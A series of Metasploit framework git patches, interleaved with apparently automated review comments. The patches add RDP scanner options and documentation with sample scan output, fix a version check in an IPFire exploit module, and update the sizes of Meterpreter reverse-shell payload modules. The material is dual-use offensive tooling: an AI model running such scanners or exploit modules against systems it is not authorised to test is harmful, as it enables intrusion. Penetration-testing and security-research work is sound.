diff --git a/modules/auxiliary/scanner/rdp/rdp_scanner.rb b/modules/auxiliary/scanner/rdp/rdp_scanner.rb
index a5a7637826..50c4cb8c01 100644
--- a/modules/auxiliary/scanner/rdp/rdp_scanner.rb
+++ b/modules/auxiliary/scanner/rdp/rdp_scanner.rb
@@ -20,6 +20,7 @@ class MetasploitModule < Msf::Auxiliary
 'Author' => 'Jon Hart ',
 'References' =>
 [
+ ['URL', 'https://msdn.microsoft.com/en-us/library/cc240445.aspx']
 ],
 'License' => MSF_LICENSE
 )
@@ -27,18 +28,18 @@ class MetasploitModule < Msf::Auxiliary
 
 register_options(
 [
- Opt::RPORT(3389)
- # XXX: add options to turn on/off TLS, CredSSP, early user, cookies, etc.
+ Opt::RPORT(3389),
+ OptBool.new('TLS', [true, 'Wheter or not request TLS security', true]),
+ OptBool.new('CredSSP', [true, 'Whether or not to request CredSSP', true]),
+ OptBool.new('EarlyUser', [true, 'Whether to support Earlier User Authorization Result PDU', false])
 ]
 )
 end
- # simple TPKT v3 + x.224 COTP Connect Request + RDP negotiation request with TLS and CredSSP requested
- RDP_PROBE = "\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00"
 # any TPKT v3 + x.2224 COTP Connect Confirm
- RDP_RE = /^\x03\x00.{3}\xd0.{7}.*$/
+ RDP_RE = /^\x03\x00.{3}\xd0.{5}.*$/
 def rdp?
- sock.put(RDP_PROBE)
+ sock.put(@probe)
 response = sock.get_once(-1)
 if response
 if RDP_RE.match?(response)
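Review bot: `RDP_RE = /^\x03\x00.{3}\xd0.{5}.*$/` is applied to a raw binary reply, but `^`/`$` are line anchors and `.` does not match a 0x0a byte unless the regex carries the `m` flag, so a Connect Confirm that happens to have 0x0a in one of the eight wildcard positions is reported as not RDP, while a reply with a newline early in it can match from its second line. `RDP_RE = /\A\x03\x00.{3}\xd0.{5}/m` anchors at the start of the buffer and lets `.` span every byte (the trailing `.*$` constrains nothing). In the new option list, `'Wheter or not request TLS security'` should read `'Whether or not to request TLS security'`, and the EarlyUser description says "Earlier User" where the option name and the setup comment say Early User. The rdp? method continues past the end of the hunk.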
@@ -53,6 +54,34 @@ class MetasploitModule < Msf::Auxiliary
 end
 end
 
+ def setup
+ # build a simple TPKT v3 + x.224 COTP Connect Request. optionally append
+ # RDP negotiation request with TLS, CredSSP and Early User as requesteste
+ requestedProtocols = 0
+ if datastore['TLS']
+ requestedProtocols = requestedProtocols ^ 0b1
+ end
+ if datastore['CredSSP']
+ requestedProtocols = requestedProtocols ^ 0b10
+ end
+ if datastore['EarlyUser']
+ requestedProtocols = requestedProtocols ^ 0b1000
+ end
+
+ if requestedProtocols == 0
+ tpkt_len = 11
+ cotp_len = 6
+ pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0 ]
+ pack_string = "CCnCCnnC"
+ else
+ tpkt_len = 19
+ cotp_len = 14
+ pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requestedProtocols ]
+ pack_string = "CCnCCnnCCCCCV"
+ end
+ @probe = pack.pack(pack_string)
+ end
+
 def run_host(_ip)
 begin
 connect
From 3ad4ff69b45cc2dee90acaa6aba7864b759ee4c6 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Mon, 17 Jul 2017 15:25:26 -0500
Subject: [PATCH 38/63] try and hard lock rex-powershell version
remove this later when the issues with this gem release are addressed
---
 Gemfile.lock | 2 +-
 metasploit-framework.gemspec | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 50c131934e..13b5f12be9 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -58,7 +58,7 @@ PATH
 rex-mime
 rex-nop
 rex-ole
- rex-powershell
+ rex-powershell (< 0.1.73)
 rex-random_identifier
 rex-registry
 rex-rop_builder
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 1e71b756d9..f4e586e798 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
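Review bot: `requestedProtocols = requestedProtocols ^ 0b1` and the two lines like it in setup combine flag bits with XOR where a bitwise OR is meant; it works only because each bit is touched exactly once, and `|=` states the intent and cannot clear a bit if a block is ever duplicated or reordered. The local is camelCase in a snake_case file, the comment ends in the typo `requesteste`, and `tpkt_len`/`cotp_len` plus the negotiation-request length (`8, 0` packed as two `C`s standing in for one little-endian `v`) are hand-kept constants that go stale the moment a field is added. Building the COTP body first and deriving both lengths from it yields byte-identical output in both branches and removes the duplicated literal arrays:
```ruby
  def setup
    # TPKT v3 + X.224 COTP Connect Request, optionally followed by an RDP
    # negotiation request carrying the protocols selected by the options
    requested_protocols = 0
    requested_protocols |= 0b1    if datastore['TLS']
    requested_protocols |= 0b10   if datastore['CredSSP']
    requested_protocols |= 0b1000 if datastore['EarlyUser']

    cotp = [0xe0, 0, 0, 0].pack('CnnC')
    cotp << [1, 0, 8, requested_protocols].pack('CCvV') unless requested_protocols.zero?
    # TPKT length covers its own 4-byte header, the COTP length indicator and the COTP body
    @probe = [3, 0, 5 + cotp.bytesize, cotp.bytesize].pack('CCnC') + cotp
  end
```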
@@ -136,7 +136,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell' + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files From e5ef737c21ef00d801e3b76392760062b54f4c63 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Mon, 17 Jul 2017 13:45:12 -0700 Subject: [PATCH 39/63] Add documentation --- .../auxiliary/scanner/rdp/rdp_scanner.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md diff --git a/documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md b/documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md new file mode 100644 index 0000000000..068377810b --- /dev/null +++ b/documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md 
@@ -0,0 +1,66 @@ +## Vulnerable Application + + Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP. + +## Verification Steps + + 1. Do: ```use auxiliary/scanner/rdp/rdp_scanner``` + 2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP + 3. Do: ```run``` + 4. If the host is exposing an identifiable RDP instance, it will print the endpoint. + +## Options + + There are three options currently supported that control what security protocols to + send in the RDP negotiation request, which can be helpful in identifying RDP + endpoints that might be locked down or configured differently: + + **TLS** Set to true to request TLS security support + **CredSSP** Set to true to request CredSSP support + **EarlyUser** Set to true to request Early User Authorization Result PDU support + +## Scenarios + + ``` +msf auxiliary(rdp_scanner) > run + +[+] 10.4.18.26:3389 - Identified RDP +[+] 10.4.18.22:3389 - Identified RDP +[+] 10.4.18.89:3389 - Identified RDP +[+] 10.4.18.9:3389 - Identified RDP +[+] 10.4.18.67:3389 - Identified RDP +[+] 10.4.18.80:3389 - Identified RDP +[+] 10.4.18.34:3389 - Identified RDP +[+] 10.4.18.70:3389 - Identified RDP +[+] 10.4.18.30:3389 - Identified RDP +[+] 10.4.18.76:3389 - Identified RDP +[+] 10.4.18.13:3389 - Identified RDP +[+] 10.4.18.91:3389 - Identified RDP +[+] 10.4.18.5:3389 - Identified RDP +[+] 10.4.18.47:3389 - Identified RDP +[+] 10.4.18.41:3389 - Identified RDP +[+] 10.4.18.105:3389 - Identified RDP +[*] Scanned 44 of 256 hosts (17% complete) +[*] Scanned 55 of 256 hosts (21% complete) +[+] 10.4.18.118:3389 - Identified RDP +[+] 10.4.18.108:3389 - Identified RDP +[+] 10.4.18.139:3389 - Identified RDP +[*] Scanned 94 of 256 hosts (36% complete) +[*] Scanned 110 of 256 hosts (42% complete) +[+] 10.4.18.157:3389 - Identified RDP +[+] 10.4.18.166:3389 - Identified RDP +[+] 10.4.18.164:3389 - Identified RDP +[+] 10.4.18.170:3389 - Identified RDP +[+] 10.4.18.185:3389 - 
Identified RDP +[+] 10.4.18.209:3389 - Identified RDP +[+] 10.4.18.188:3389 - Identified RDP +[*] Scanned 156 of 256 hosts (60% complete) +[+] 10.4.18.237:3389 - Identified RDP +[+] 10.4.18.225:3389 - Identified RDP +[*] Scanned 186 of 256 hosts (72% complete) +[*] Scanned 194 of 256 hosts (75% complete) +[*] Scanned 208 of 256 hosts (81% complete) +[*] Scanned 253 of 256 hosts (98% complete) +[*] Scanned 256 of 256 hosts (100% complete) +[*] Auxiliary module execution completed +``` From ba92d42b5763ce3ba9c7eea6fe5f2b9447845e40 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Mon, 17 Jul 2017 15:52:50 -0500 Subject: [PATCH 40/63] Updated version check per @bcoles --- modules/exploits/linux/http/ipfire_oinkcode_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index 7dad137ea5..d4238b6c0b 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote end # now that we've pulled the info we need, check version. - if version && update && version.eql == '2.19' && update.to_i <= 110 + if version && update && version == '2.19' && update.to_i <= 110 CheckCode::Appears else CheckCode::Safe From 39b2e824ec14cb2f63450493babfc83c975e38dd Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 17 Jul 2017 15:43:31 -0700 Subject: [PATCH 41/63] Bump version of framework to 4.15.3 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 13b5f12be9..b0ad333b5b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ GIT PATH remote: . specs: - metasploit-framework (4.15.2) + metasploit-framework (4.15.3) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) 
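Review bot: `update.to_i <= 110` on the corrected line still turns any non-numeric `update` into 0, so when the scraped update field is present but is not a number the check returns `CheckCode::Appears` instead of erring toward `Safe`. If `update` is the string it appears to be, guarding it with `update =~ /\A\d+\z/ && update.to_i <= 110` keeps a malformed or unexpected page from being reported as a confirmed version. The check method continues outside the hunk on both sides.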
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 6321a6f85e..712ec5a517 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.15.2" + VERSION = "4.15.3" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From cc3168933f313c0d84ccf15466ddd4b5157042ea Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Tue, 18 Jul 2017 13:13:38 -0500 Subject: [PATCH 42/63] update mettle payloads, template generator --- Gemfile.lock | 4 +- metasploit-framework.gemspec | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../aarch64/meterpreter_reverse_https.rb | 2 +- .../linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../linux/armbe/meterpreter_reverse_http.rb | 2 +- .../linux/armbe/meterpreter_reverse_https.rb | 2 +- .../linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/armle/meterpreter_reverse_http.rb | 2 +- .../linux/armle/meterpreter_reverse_https.rb | 2 +- .../linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../linux/mips64/meterpreter_reverse_http.rb | 2 +- .../linux/mips64/meterpreter_reverse_https.rb | 2 +- .../linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc/meterpreter_reverse_http.rb | 2 +- .../linux/ppc/meterpreter_reverse_https.rb | 2 +- .../linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../ppc64le/meterpreter_reverse_https.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- .../linux/x64/meterpreter_reverse_http.rb | 2 +- .../linux/x64/meterpreter_reverse_https.rb | 2 +- .../linux/x64/meterpreter_reverse_tcp.rb | 2 +- .../linux/x86/meterpreter_reverse_http.rb | 2 +- .../linux/x86/meterpreter_reverse_https.rb | 2 +- .../linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../linux/zarch/meterpreter_reverse_http.rb | 2 +- .../linux/zarch/meterpreter_reverse_https.rb | 2 +- .../linux/zarch/meterpreter_reverse_tcp.rb | 2 +- .../meterpreter_reverse_http.rb} | 21 +++++---- .../osx/x64/meterpreter_reverse_https.rb | 45 +++++++++++++++++++ 
.../osx/x64/meterpreter_reverse_tcp.rb | 7 ++- tools/modules/generate_mettle_payloads.rb | 36 ++++++++------- ...er_reverse.erb => meterpreter_reverse.erb} | 16 ++++--- 40 files changed, 130 insertions(+), 67 deletions(-) rename modules/payloads/singles/osx/{x86/meterpreter_reverse_tcp.rb => x64/meterpreter_reverse_http.rb} (61%) create mode 100644 modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb rename tools/modules/{linux_meterpreter_reverse.erb => meterpreter_reverse.erb} (72%) diff --git a/Gemfile.lock b/Gemfile.lock index 13b5f12be9..d19609ffa3 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -30,7 +30,7 @@ PATH metasploit-model metasploit-payloads (= 1.2.37) metasploit_data_models - metasploit_payloads-mettle (= 0.1.10) + metasploit_payloads-mettle (= 0.1.13) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.1.10) + metasploit_payloads-mettle (0.1.13) method_source (0.8.2) mini_portile2 (2.2.0) minitest (5.10.2) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f4e586e798..4b6614e1b3 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.13' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index fe533ba2e2..17b86565e0 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index b7ec5eaf23..9122765380 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 8f52504dbb..f407e0daf0 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index efd415b4f8..6c876d1bee 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index 8f1e1ee119..b77e2f7c23 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index ff65f14f9e..3bd0c0e77d 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 54bd7d06c7..e643614ecf 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index c8c58653c9..0c07ad94cf 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index a156cecc4b..51db411ca4 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 1316f50c33..a09f014fde 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index ee2989048a..5abfa80bc9 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index bf40874804..f468ddbada 100644 
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index dd52bbdcb1..50d9bf8fd4 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index c77c364f8e..c061ad7603 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 7484609efa..af9d102c50 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 0c9523f14b..e458dea19c 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 4ccc63a1b8..c4909660cd 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 80f1085036..e713c3d24b 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 884f95a9e4..13eb0ba7af 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 5d26e63a25..a09a19a99c 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index 84c45966ce..157791c38f 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index 251f57fa6a..b6e36369ca 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 92af2311c4..c9a316920d 100644 
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 1e7f8aa3b7..ffb57406a2 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 18f404a247..1b8616e199 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index c0f52dbf15..0a39b3bc0b 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
